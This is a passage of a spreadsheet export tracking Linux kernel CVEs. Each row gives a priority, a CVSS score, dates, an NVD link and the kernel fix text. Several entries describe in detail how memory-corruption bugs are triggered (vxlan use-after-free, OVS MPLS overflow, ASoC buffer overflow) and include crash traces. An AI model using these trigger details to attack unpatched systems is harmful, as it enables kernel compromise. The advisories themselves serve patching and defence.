  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  Read of size 1 at addr ff110001039c6e08 by task poc/771
  Call Trace:
  ? ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  packet_sendmsg (net/packet/af_packet.c:2959 net/packet/af_packet.c:3053 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 8 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97602</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97612</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin, rust</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr"/>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mpls: clear inner_protocol when the last label is popped
skb_mpls_push() records the pre-encapsulation network header once, gated
on !skb-&gt;inner_protocol. skb_mpls_pop() never clears that record, so it
outlives the encapsulation it describes.
Open vSwitch can then re-push MPLS onto a packet whose
inner_network_header still points at the older, deeper offset: push a
label, pop every label, recirculate (ovs_flow_key_update() re-derives
key-&gt;eth.type and resets network_header, but leaves inner_*), then push
again. ovs_fragment() trusts the record:
	skb-&gt;network_header = skb-&gt;inner_network_header;
so skb_network_offset() goes negative. The bound check is signed:
	if (skb_network_offset(skb) &gt; MAX_L2_LEN)
a negative offset passes it, and prepare_frag() widens the value:
	unsigned int hlen = skb_network_offset(skb);
	memcpy(&amp;data-&gt;l2_data, skb-&gt;data, hlen);
which is a ~4GiB memcpy out of a 30-byte per-CPU buffer.
Reproduced on v7.3-rc1. RDX is the truncated length, (unsigned int)(-8):
  BUG: unable to handle page fault for address: ffffe8ffffc16000
  #PF: supervisor write access in kernel mode
  Oops: 0002 [#1] SMP KASAN NOPTI
  RIP: 0010:memcpy+0x8/0x20
  RDX: 00000000fffffff8 RSI: ffff888105d732db RDI: ffffe8ffffc16000
   prepare_frag+0x3df/0x4e0
   ovs_fragment+0x589/0x7e0
   do_output+0x4ce/0x5e0
   do_execute_actions+0x55d2/0x7b30
   ovs_execute_actions+0xea/0x450
Same root-cause shape as commit 975b5b067f52 ("ipv6: sr: restore network
header before routing and forwarding"): a stale network header offset
reaching a consumer that widens it. Here it originates in the MPLS
push/pop path.
Clear inner_protocol once the packet is no longer MPLS, so a later push
re-records the current header. net/sched/act_mpls.c is the only other
skb_mpls_pop() caller and gets the same fix; sch_frag.c saves and
restores inner_protocol around fragmentation in the same way OVS does.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97612</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97910</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr"/>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: sprd: validate compress buffer sizes against fixed allocations
sprd_platform_compr_open() allocates the stage 0 IRAM buffer (32K data
area) and the stage 1 DDR buffer (2M data area) with fixed sizes, but
sprd_platform_compr_copy() derives all copy lengths from the user
controlled runtime-&gt;fragment_size and the write() count, never
comparing them against the physical buffer sizes. The compress core
only checks fragment_size * fragments for an u32 overflow in
snd_compress_check_input(), so a local user can configure a logical
buffer of up to ~4GB via SNDRV_COMPRESS_SET_PARAMS, far exceeding the
fixed allocations.
A fragment_size larger than the 32K IRAM data area makes the stage 0
copy_from_user() overflow past the IRAM allocation, and a buffer_size
larger than the 2M DDR buffer makes the wrapping copy at the end of
sprd_platform_compr_copy() write fully user controlled data past the
buffer. No SNDRV_PCM_TRIGGER_START is needed, a write() in SETUP
state reaches the copy callback directly.
Reject parameters that do not fit into the fixed buffers in
set_params(), and fix the advertised max fragment size: 128K never
fitted into the 32K IRAM buffer. The caps values may have been carried over
from the qdsp6 driver, which allocates its buffers according to the
advertised maxima, unlike this driver. With 32K as max fragment size
the advertised limits are self-consistent: 32K * 64 = 2M equals the
DDR buffer size.
Discovered by Atuin - Automated Vulnerability Discovery Engine.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97910</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97971</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr"/>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nstree: check listing permission before taking a namespace reference
legitimize_ns() takes a reference on the candidate namespace before
may_list_ns() has decided whether the caller may see it. The
__free(ns_put) cleanup on the denied path can drop the last reference to a
mount namespace while we still hold the rcu read lock, and put_mnt_ns()
may sleep there. This is the same problem commit 2ec2aff3c8e2 ("ns: make
sure reference are dropped outside of rcu lock") fixed for the put_user()
path. Neither ns_requested() nor may_list_ns() needs a reference, both
only look at the namespace type and at the caller's own namespaces, so do
the checks first and take the reference last.
Splat:
  Voluntary context switch within RCU read-side critical section!
  WARNING: kernel/rcu/tree_plugin.h:332 at rcu_note_context_switch+0x238/0x2a0, CPU#5: a/3442
  CPU: 5 UID: 1000 PID: 3442 Comm: a Not tainted 7.0.0-30-generic #30-Ubuntu PREEMPT(lazy)
  RIP: 0010:rcu_note_context_switch+0x238/0x2a0
  Call Trace:
   &lt;TASK&gt;
   __schedule+0xcf/0x650
   schedule+0x27/0x90
   schedule_preempt_disabled+0x15/0x30
   __mutex_lock.constprop.0+0x550/0xaf0
   __mutex_lock_slowpath+0x13/0x20
   mutex_lock+0x3b/0x50
   exp_funnel_lock+0xb2/0x260
   synchronize_rcu_expedited+0xe7/0x220
   namespace_unlock+0x26a/0x320
   put_mnt_ns+0xd3/0x120
   mntns_put+0xe/0x20
   do_listns+0x13e/0x560
   __do_sys_listns+0x126/0x2d0
   __x64_sys_listns+0x20/0x30
   x64_sys_call+0x2366/0x2390
   do_syscall_64+0x105/0x5a0
   entry_SYSCALL_64_after_hwframe+0x76/0x7e
   &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97971</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97991</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr"/>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_blk: reject out-of-range sector starts
vdpasim_blk_check_range() logs an invalid start sector but continues
validating the request.  The subsequent unsigned capacity subtraction can
underflow and let an out-of-range buffer offset reach the data path.
The invalid offset is used by three request paths.  VIRTIO_BLK_T_OUT
copies guest data to blk-&gt;buffer + offset through
vringh_iov_pull_iotlb(), causing an out-of-bounds write in
_copy_from_iter() or memcpy().  VIRTIO_BLK_T_IN copies from
blk-&gt;buffer + offset to the guest through vringh_iov_push_iotlb(),
causing an out-of-bounds read in _copy_to_iter().
VIRTIO_BLK_T_WRITE_ZEROES passes blk-&gt;buffer + offset to memset(),
causing an out-of-bounds write.
Reject starts at or beyond the capacity before the subtraction.  Treat the
capacity boundary as invalid because the IN and OUT paths round byte counts
down to sectors for validation but later copy the original byte counts.  A
sub-sector request at the capacity boundary would otherwise still access
past the end of the buffer.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97991</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98023</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr"/>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: reject dynamic fdb entries that reference a nexthop id
The commit cited in the Fixes tag allowed VXLAN FDB entries to point to
FDB nexthops so that overlay traffic could be load balanced across
multiple VTEPs. Such entries can only be configured from user space,
cannot be learned and cannot roam. They only make sense with a user space
control plane such as E-VPN where data plane learning is disabled.
Despite that, the VXLAN driver does not currently prevent such entries
from being configured with the "dynamic" flag. The per-nexthop FDB list
is only protected by the per-device hash lock, which is not sufficient
when two VXLAN devices point to the same FDB nexthop and therefore share
the list. Aging runs in softirq context without RTNL, so an entry deleted
by one device can race with an addition or deletion from the other,
leading to list corruption:
  list_del corruption. next-&gt;prev should be ffff8881069d9548, but was
  dead000000000122. (next=ffff8881069d9448)
  WARNING: CPU: 0 PID: 90 at lib/list_debug.c:65
  __list_del_entry_valid_or_report+0x1aa/0x210
  ...
   vxlan_fdb_destroy+0x5b8/0xad0
   vxlan_cleanup+0x328/0x450
   call_timer_fn+0x2a/0x1c0
   run_timer_softirq+0x18c/0x210
  BUG: KASAN: slab-use-after-free in vxlan_fdb_destroy
Fix this by rejecting the bogus configuration of dynamic FDB entries that
point to FDB nexthops, both when created and when an existing entry is
updated. As such, the per-nexthop FDB list is only ever mutated under the
RTNL lock. Add test cases to make sure that this does not regress in the
future.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98023</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98073</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr"/>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: Remove conflicting altnames for dying netns in __dev_change_net_namespace().
syzbot reported the warning in cfg80211_pernet_exit(). [0]
The repro does the following:
  1. create two device in root netns and non-root netns
  2. assign the same altname for the two devices
  3. remove the non-root netns
Since commit 7663d522099e ("net: check for altname conflicts
when changing netdev's netns"), cfg80211_switch_netns() and
cfg802154_switch_netns() fail if init_net has a device with the
conflicting altname.
default_device_exit_net() had the same issue and commit d09486a04f5d
("net: fix removing a namespace with conflicting altnames") fixed it.
cfg80211_pernet_exit() and cfg802154_pernet_exit() need the same fix.
Let's generalise the fix by removing conflicting altnames for dying
netns in __dev_change_net_namespace().
[0]:
cfg80211_switch_netns(rdev, &amp;init_net)
WARNING: net/wireless/core.c:1871 at cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871, CPU#1: kworker/u8:9/1160
Modules linked in:
CPU: 1 UID: 0 PID: 1160 Comm: kworker/u8:9 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
Workqueue: netns cleanup_net
RIP: 0010:cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871
Code: e8 03 42 80 3c 20 00 74 08 4c 89 f7 e8 b4 ef 0e f7 4d 8b 36 49 81 fe 20 10 4a 90 74 12 e8 03 3d 9f f6 eb 85 e8 fc 3c 9f f6 90 &lt;0f&gt; 0b 90 eb cc e8 f1 3c 9f f6 eb 05 e8 ea 3c 9f f6 5b 41 5c 41 5e
RSP: 0018:ffffc900057a78f0 EFLAGS: 00010293
RAX: ffffffff8b287154 RBX: ffff88807ba72780 RCX: ffff8880213e8000
RDX: 0000000000000000 RSI: 00000000ffffffef RDI: 0000000000000000
RBP: 00000000ffffffef R08: ffffffff9024cc67 R09: 0000000000000000
R10: fffff52000af4eb0 R11: fffffbfff204998d R12: dffffc0000000000
R13: ffffffff904a1080 R14: ffff888144ed0008 R15: ffff888144ed0e20
FS:  0000000000000000(0000) GS:ffff888124de6000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005642de0a8a70 CR3: 000000007a40c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 ops_exit_list net/core/net_namespace.c:200 [inline]
 ops_undo_list+0x43d/0x8d0 net/core/net_namespace.c:253
 cleanup_net+0x572/0x810 net/core/net_namespace.c:706
 process_one_work kernel/workqueue.c:3387 [inline]
 process_scheduled_works+0xc3d/0x1630 kernel/workqueue.c:3470
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3551
 kthread+0x38b/0x480 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98073</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98122</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr"/>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: mdb: Fix use-after-free in vxlan_mdb_remote_src_del()
vxlan_mdb_is_valid_source(), which validates MDBE_ATTR_SOURCE and every
MDBE_ATTR_SRC_LIST member, accepts the all-zeros address.
A source list is only accepted on a (*, G) entry, whose source is the
all-zeros address, and for each member of the list an (S, G) entry is
derived from it by substituting the source. Entries are keyed by a plain
memcmp() of struct vxlan_mdb_entry_key, so if MDBE_ATTR_SOURCE is present
and holds the all-zeros address and the source list holds it as well, the
derived (S, G) key is byte-identical to the (*, G) key and resolves to the
same entry. Omitting MDBE_ATTR_SOURCE is not equivalent, as the key is
then left with a zero address family.
vxlan_mdb_remote_src_del() removes the forwarding entry of a source before
freeing the source entry:
	vxlan_mdb_remote_src_fwd_del(vxlan, group, remote, &amp;ent-&gt;addr);
	vxlan_mdb_remote_src_entry_del(ent);
With the keys aliased, the first call deletes the remote of the entry that
owns 'ent' instead of a separate (S, G) entry, and frees 'ent'. The second
call then runs on the freed entry, and its hlist_del() reads -&gt;pprev and
-&gt;next out of it and writes through them.
Adding the (*, G) entry with NLM_F_REPLACE and no source list marks the
all-zeros source for deletion and reaches this from the sweep at the end
of vxlan_mdb_remote_srcs_replace().
  BUG: KASAN: slab-use-after-free in __vxlan_mdb_add+0x1cd/0xd70
  Read of size 8 at addr ffff888102852500 by task poc/84
   __vxlan_mdb_add+0x1cd/0xd70
   vxlan_mdb_add+0xc0/0x140
   rtnl_mdb_add+0x157/0x2a0
   rtnetlink_rcv_msg+0x207/0x5a0
  Allocated by task 84:
   __kmalloc_cache_noprof+0x153/0x360
   vxlan_mdb_remote_srcs_add+0x2eb/0x440
   __vxlan_mdb_add+0x803/0xd70
  Freed by task 84:
   kfree+0x14c/0x3b0
   vxlan_mdb_remote_del+0x129/0x1a0
   __vxlan_mdb_del+0x4f/0xe0
   vxlan_mdb_remote_src_fwd_del.isra.0+0x162/0x1b0
   __vxlan_mdb_add+0x1c5/0xd70
The MDB operations are netns-scoped, so an unprivileged user can perform
them in a new user and network namespace.
Reject the all-zeros address in vxlan_mdb_is_valid_source(), which covers
both call sites. A (*, G) entry is expressed by omitting the source, so
nothing legitimate is refused.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98122</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98156</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr"/>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/virtio: use the DMA API for resource backing on Xen
On a Xen PV domain page addresses bear no relation to the real machine
addresses the host would have to use to reach it.
virtio_ring.c handles this correctly, vring_use_map_api() returns true
for any xen_domain() regardless of VIRTIO_F_ACCESS_PLATFORM.
virtio-gpu makes the same decision independently, but its copy
looks only at the feature bit:
	bool use_dma_api = !virtio_has_dma_quirk(vgdev-&gt;vdev);
QEMU does not set iommu_platform on virtio-vga by default, so
VIRTIO_F_ACCESS_PLATFORM is not negotiated, use_dma_api is false, and
virtio_gpu_object_shmem_init() describes the framebuffer's backing pages
to the host with sg_phys().  Those are guest-physical addresses. In a PV
domain they resolve, on the host side, to pages belonging to some other
domain, so the host scans out unrelated memory.
Move the decision into virtio_gpu_use_dma_api() and give it the
xen_domain() check, like vring_use_map_api() has. This
additionally enables the dma_sync_sgtable_for_device() calls in
virtgpu_vq.c, which are required for correctness whenever swiotlb
is in play.
Reproduced with a Xen 4.21 PV dom0 nested inside QEMU 8.2 with
virtio-vga, on both a distro 6.8 kernel and 6.18 LTS. A PVH dom0
works fine and doesn't need this fix because it is identity-mapped,
only PV dom0s are affected.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98156</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100578</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
